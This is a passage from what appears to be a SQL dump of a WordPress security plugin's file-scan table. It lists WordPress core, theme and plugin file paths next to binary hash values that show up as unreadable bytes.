lξ\"a\0אּ�t�ޡD','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��i���詿/�!','��(Y�E�U��<d�y���K	2�bsy�Z�L�','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!','	�H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\H���:��u3�%�Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�2�H���$�\n�','5�(�/��PhJS�Z\"&]}���r�Ip�(�-t��','',0,'?'),('\\[��i%Ͱ<��e�>�','wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('\\���mՀ����;�','wp-content/plugins/wp-cerber/assets/flags/eg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�֙�x�8��\0 ','�_�ih��<�[������Ns�D}?\'��C�Y','',0,'?'),('\\������7���Q�o','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('\\�т�?$�̈́8����','wp-admin/includes/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ê��m\Z�E��Y��.','&����3��eſ�.��(���{��T�Cv.','',0,'?'),('\\��u�]�A%� �','wp-content/themes/twentytwenty/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�*�����	','4\nO�ҩ��i����;Vt6\'�@1I�ȋ�W','',0,'?'),('\\�\0��>�+���Fb��','wp-admin/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U��:#�+a���F','�C���f��`���]����|#wVÉBH)\r','',0,'?'),('\\ֶ�S��\n��P�:�','wp-content/themes/twentynineteen/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��8v�D����','�N�1����1�swR�������������','',0,'?'),(']&��A��!�S�K>�','wp-content/themes/twentytwentyone/assets/images/Reading.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�*���|).��h','��Q�-:�ñ��1Z��ŴCxʞ�dd;Z�b�^','',0,'?'),('](R�&!��1;�3��','wp-includes/js/wp-ajax-response.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�Hme_\Z��!5','��c�����z�2�~;~�D��*T�?�&�','',0,'?'),(']9.�pe���T���','wp-content/themes/twentynineteen/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'&iɴ�G��x��Rl:','�JÂ���W�S��\"�V�JZɌM�ڛ�D','',0,'?'),(']9OUâ��\n��V','wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڗU�_|�$>���7','wR�u�sXq��s�a�OFvQ�y�Ł#���','',0,'?'),(']B#�2�z��bU��/','wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),(']L0���eE�\"u� ��','wp-includes/js/mediaelement/mediaelement-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),(']x��6�a�[�|��','wp-content/plugins/wp-cerber/assets/flags/sl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nU�r�̨�^̧\0�','h�+ѩEfp��\Z��tт�5�X���T:�K�6','',0,'?'),(']����ΰ��m','wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2������j�^��!��','��)秐=�l2^m�\r���uV20�ژM{�','',0,'?'),(']���N��Jjӎe���','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�����O���\\��','�b�Z�r��A��{�_���d���5|','',0,'?'),(']���r�:@��I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6:����2kP3���','%u���Mp����,.\0�@�Zq��r��/���Q','',0,'?'),(']��P���Tkvt��8A','wp-admin/network/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ż\Z�=>� ɱ�l�','y�TQmU��z�D��s�g���1^T\"�ig�I','',0,'?'),(']���*������J�','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��E��H)�.��','��& �qC1QU�_.O��3����1!&��۴��','',0,'?'),(']����\"}[�Y�R�','wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H7g���8Y�y�','��Ϛ����Z:��J�Dz��#y04�?','',0,'?'),(']�D�d���3��3�t�','wp-content/plugins/wp-cerber/assets/flags/hr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZO��e.��.�o','e��T��\\��B;vu��!�\0~\" P��;�','',0,'?'),(']�\r��1��PG@��w','wp-content/themes/magazine-hoot/include/admin/trt-customize-pro/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\I6\n�\0}�S�t','��4��/��%���\rx�+u;VJ�s�z�o��','',0,'?'),('^�4�j�|��I��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�H*f��$��ʝӐ','���Ɲic�z�P��1�\"ݢӛo�TWry�*F','',0,'?'),('^(�?�t�p���,$�','wp-includes/block-patterns/large-header-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\r��\Z�&o�r\'���','\0�9�w�i����5�������}���h��','',0,'?'),('^9(-(Ų�y ���0q*','wp-admin/user/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�N ����9�3nDl','r���R89�<�;9i1l�Z���Q��oC#�Y��','',0,'?'),('^@ղ{\'��_���92','wp-admin/upgrade-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[a�@1.��Q��Z','�tˁ�����9{��/��y�g1\'�uV��l�','',0,'?'),('^H\0�B|��4�@z��','wp-includes/IXR/class-IXR-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('^U�.i��ypG���','wp-includes/js/mediaelement/mediaelementplayer-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('^d?e��.o���ʨ�L','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�C�=sy3�L���','�_��o3�t�Y��_o��f2k#��0�6Ps;','',0,'?'),('^yG=ڜFg;3�á�','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RC���Ty�?�','D����H�~����Ϩ�P�_�{�!��','',0,'?'),('^�Ð��+�y|�','wp-includes/images/crystal/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('^�����29�E{F�','wp-content/themes/magazine-hoot/include/admin/images/slider-type-carousel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��bFK�.��Ϫ�','�����\Z���{\r���O\0���t֛�6�L�','',0,'?'),('^��2�7}�����I��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^ь�����{�O�','vZ���d¥���bNpz04\\��\ZL��I��v�','',0,'?'),('^��u�u��W�d�M=�','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=E�o0��[�','�m?\Z�\"�g��=�0�N\"��Q��`�u\'��~I','',0,'?'),('^ǿ��+C%K��x�','wp-content/themes/twentytwentyone/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���� ,��*]�1�n','���0CfIΰa����BqG�8��O�u>�Wþ','',0,'?'),('^�^\\Q��=(w��','wp-includes/js/imagesloaded.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('^�\r6&�ҖF;��oB','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P%S�%<��?�\Z��\\','gO�:!��rh��ʀ6�\'wf��D���z�','',0,'?'),('_�\0��d �MP~��D','wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pق�g�OVjX�����','�4k�B�3S��������\"���\ZBG�ǎ\0KV','',0,'?'),('_�k4�!*}��݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|%��*T*�`�','�����289v�u3�n	C2�s��va/�','',0,'?'),('_*�⽞L�0�>\r','wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN+�5	��O?','�@!�`C��*Me��z�j@	�@���L�jw�','',0,'?'),('_�#��U1p�GS�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���rt��w��(�e','�ҿD�I<�^�i2dW�]G�_�-+�A8�W','',0,'?'),('_/dyY�\r�}$ʓ��','wp-content/plugins/wp-cerber/assets/flags/ni.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�MZsu���/��','�Cd0���HF|�\ne��ʅ�p�_�SӲ@\0@1<ۊ','',0,'?'),('_B��\0��r�p�Iu��','wp-content/themes/twentynineteen/sass/variables-site/_structure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�!��Y�r8ܗt/�','=�\0t��d\n�J��e�ܐ��Z<��s�n6��t�','',0,'?'),('_j��_��/���yӱ','wp-includes/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x8�7n�LH�g�gf�R','ŗْl5�������Xt�����C�\n�mA','',0,'?'),('_�f�>��*��_\n','wp-content/plugins/wp-cerber/assets/flags/ru.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q���j�/�53\r�','�z\rf�/���x�.��5Q&i�HCn�0�','',0,'?'),('_�O�$^����5��','wp-content/plugins/wp-cerber/assets/ui-stack.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#`LZ)�pd��','Ɉ���H���R�{(~\0*8���!�^�u�','',0,'?'),('_�|��T�M^���J','wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p^�,f�ޡ�����I{�','��i�4�j�v�J5�d���߲TP��L�/��7�','',0,'?'),('_��4�3���=��','wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('_�(�C���M6�9�','wp-admin/includes/class-wp-links-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�6�Z3@][:����+','A���D��c?��L���I�OB��Oß��L','',0,'?'),('_����8}���?�','wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���X�Н�KH�Os8�',')�Z\\��^��hG*y����2Ԏ�k]䜹Yu�5*','',0,'?'),('`��S�`NI�^G�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�i@�G�g��0�p','G��<�/�14Ņ�L��5�������!','',0,'?'),('`%�ֽ�j��\'��P��','wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0K@�n��d�Œ�Ψ�','��-(j�e�Q5���3��\0`NJ�b�(OS�:b','',0,'?'),('`��o�\'�c?��/ �','wp-content/themes/twentynineteen/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�-�mם�]�','�I\Z�{��!��M}OL�bdpO���hV�Û�','',0,'?'),('`��gf�W�\n&OPw','wp-content/plugins/wp-cerber/assets/flags/sg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*F��Y����K�	a','Ԩ��Vm�f��Ek$��;]N_q�^�4����(�','',0,'?'),('`��\n���2����','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V��DBQVgF','w��86=�ݔ����2�\rD%V��E5�S�	�T�','',0,'?'),('`���#��Q�?>6)','wp-content/plugins/wp-cerber/assets/flags/fk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�OwB<����oa9�E�','�k��؊�2��M&C9�&0d�Hl��q~9q','',0,'?'),('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�@؇\0����)','�_Z�#W�șf�X���c�B���`��dQfH�,','',0,'?'),('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	>�U6ƪg��v�f','R�&sX$6#���_��ν�J�|�b0�o','',0,'?'),('`����r\'ڃ���','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]���찉O�O&���','5�yIx4k5_����*W�i�-\n�C���|�\"B�','',0,'?'),('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�8û�Td�h9�\Z','��g�n\\�y|�TR�xF����\\��A��&7֏�d','',0,'?'),('a�)6����ю�','wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY ����V�Z��Gen�_','',0,'?'),('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4^&$o��uf&�','�wWd¼8P�F6�A����ܴ�to-��X\\��a$','',0,'?'),('ap�WJ���ʤ	�)\n','wp-content/themes/magazine-hoot/include/admin/images/3-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']:P�/�B��Z*��u','��M\0�7��E��7�1{h�V�yEf 4d��0','',0,'?'),('a�?��_�ˢ��6j��X','readme.html',0,'c��P���n�HH˭�','c��P���n�HH˭�','8��	8�9��(L��:v�2l1�TSV����','',0,'?'),('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r�	��&��!','',0,'?'),('a����(m�EB�l�','wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]p�uA@j4� k','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�D���w�o��}�D','	e�S�\nyp|Y��*h�.���ѽ⿞�ʆX','',0,'?'),('a�~*k`D�np�}��f','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+f)��W;kgWJ��','�`�%��qY2��ʌ��?ǽ����ͷ]���','',0,'?'),('a�0�}�踀�@���~','wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fB��RJ���z�L���','�b\n=W��p�����=����3���9�\"֗;','',0,'?'),('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Э�bJ������\r%','�*��>}6��?j-9�N�AJ|�r���w�d�','',0,'?'),('a�&S���T�\"�l�9','wp-content/plugins/wp-cerber/assets/inspector.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zn�d���*k��P�j','�	�o���7Xv�o\ZC�D�j����p��','',0,'?'),('a��-�b��$G�Ι','wp-content/plugins/wp-cerber/assets/flags/sh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�{ͤ�:u�d�','�R<,l��I@�X�ߠ.#pF�g�%1O���6�','',0,'?'),('bY�,��ϥY�r۝�;�','wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('bxR@���ʲ�3ꄳ','wp-content/themes/magazine-hoot/hybrid/inc/functions-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�\0T^��4��-I','BW��܇�m���?������%4��~>4','',0,'?'),('b���9���GQE��ґ','wp-content/plugins/wp-cerber/assets/flags/lv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���JqW6A���`>','�\0���jn!-xv��+u�j��D���<�7!�5�#','',0,'?'),('b���.ӛ����','wp-content/plugins/wp-cerber/assets/flags/om.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r]-�K��K<ݳ�8�','�;�8K�KI�k�O�[��\0v�U[JR$ ��','',0,'?'),('b��HV��mA �Mh�\"�','wp-content/themes/twentytwenty/assets/images/2020-square-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܴ���6T�k�x','�L�w%���7�M��ȴ�x� � >��?\\�','',0,'?'),('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�@����	�|���O�','g�v����K%��oiS�7�.�]�siH��2:p','',0,'?'),('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F꡻�S)8�׆>]�','',0,'?'),('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('b񪥲K�+x����wF','wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ç4�[�J��#�\'�','/˵t�?���;�!�o��Q$fm<L^��6E\r��x','',0,'?'),('c餟��(Ok1�!͂','wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��W�\r��p4>9Z','*MY��P0������+5~���!�9OR�mҩ','',0,'?'),('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@d�B��#�&&��','{��bk��\r���}�	{=��\\�=6�`l��	','',0,'?'),('c‹���p	�PU3/�','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM���,~/���r','F;���W]��&��z~o\'�/��q�+��','',0,'?'),('c%a��H�����','wp-admin/images/about-color-palette-vert.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�A�6���q�]�','�^��5P���n��>��:�����,G�I�z�R�','',0,'?'),('c,���[xޫ�3�\n�@','wp-includes/js/jquery/jquery.masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@`���&n|�}A��','�\\ۙ����	}M�g� �$�0� [���B','',0,'?'),('c42j���x�c��d','wp-includes/Requests/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��݆��Ζ���}l�','e`݆�.�΃:��j�E�\Z�Ұ���5�\Z�)','',0,'?'),('c��E�cc�/2��F','wp-content/plugins/wp-cerber/assets/flags/ba.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S߫��ܟ�]�A;\Z���','\Z2��u2S��9{��Ө�G�D�+�����1�','',0,'?'),('c�Q��i�����Qv','wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','հv��}�Ifs��>�','�J����Tc68H�\Z�s\'9]�6�p���4d','',0,'?'),('c�׭�z8��5Y���','wp-content/plugins/wp-cerber/assets/flags/pr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����M�_6�p�tz','n��S�X��\Z�h�m2��9��q���\Z�Z','',0,'?'),('c�c������gu���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('c��[b]��ݽ�JF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I]�U��	X�g����','�T�Ϛ-�1 [�@./i󒶦�i��q��0�o','',0,'?'),('d��:w���O�І','wp-includes/ID3/getid3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('d��1�쵓-�;O��','wp-admin/js/custom-background.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L-Ф�%��l�r�e�','�����ė�\"ٿjz�r�?:j\'��������','',0,'?'),('dF=���j��Hc�����','wp-content/plugins/akismet/wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]x�\"�Y�����KJ','\Z�Ia�^���iJ��H�:�j�:���b�Š�','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\rc�c�l��?ɴծ','9� ÂM�\0KR���&���#+�vCf��','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\"����#�\'޻','j��$��)�~ŗH�x���}J�1z�м�v��','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<3�8xuFR�ĖȦ�E','n��?Q��bz	��٢�)��S*��,Z�','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�N���ﭪ=j\0��','�jG�AV�sF�����j�+�-)�D����','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I��H��%���Y','���V��/r:s�/�S��l�\"#��:�3�','',0,'?'),('e��e{��:\0�vy','wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�84|�]��h�֤�','����Aݻ�F�d�s`����0$$�{^����=�','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�رm:h�\rGZ�ڋY','t8uU��U��SĒ�qf����S�3i���i�u','',0,'?'),('e�P�f��o!�J�%','wp-content/plugins/wp-cerber/assets/flags/yt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FE=�W��=�\'���','-�*U��	�K-:��햴�O��ա�3','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :\'D<��*T;�G�','W 3\n�\'@G8y��;�FwTD���Zv�X�}��','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`X�c�b7�qNS�','�M���G�] �?u��gP�p1�,�(�V�^���','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c��	;���*r3$X����G8ͬRK�','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+�	��uzR�W	QW�|��5��� j[;U|�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('eއ��D�z\r\Z\n���)','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�b*�\0dH��d.','Wq$!MW^f�q]]��Y/�e��>�xW3�\"ѿ','',0,'?'),('e�O̾%GԳp�p4�+x','wp-content/themes/magazine-hoot/include/admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�Z�\\o�t�^�','��{|��R��l����p�	c�&�\ngm\r�s�','',0,'?'),('f)�od���#��8��M','wp-content/themes/magazine-hoot/include/admin/images/menu-table.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d��\r��7lD�','zĥ�!���:��L�7DbW 